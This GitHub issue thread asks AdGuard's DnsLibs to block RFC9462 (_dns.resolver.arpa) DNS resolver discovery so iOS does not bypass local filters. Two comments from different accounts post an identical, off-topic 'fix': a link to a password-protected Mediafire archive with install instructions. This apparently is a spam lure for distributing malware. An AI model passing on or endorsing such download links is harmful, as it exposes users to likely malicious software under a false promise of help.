### ISSUE TITLE
Block RFC9462 (_dns.resolver.arpa) queries

### ISSUE THREAD

**Issue by sfionov** [AdguardTeam/DnsLibs#228]
Since 2022, iOS has capabilities to automatically switch to DoH. We should block auto-discovery to avoid unexpected behaviour (e.g. local filters won't be applied in this case)

User can manually switch to system DoH, if he wants, in AdGuard.

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
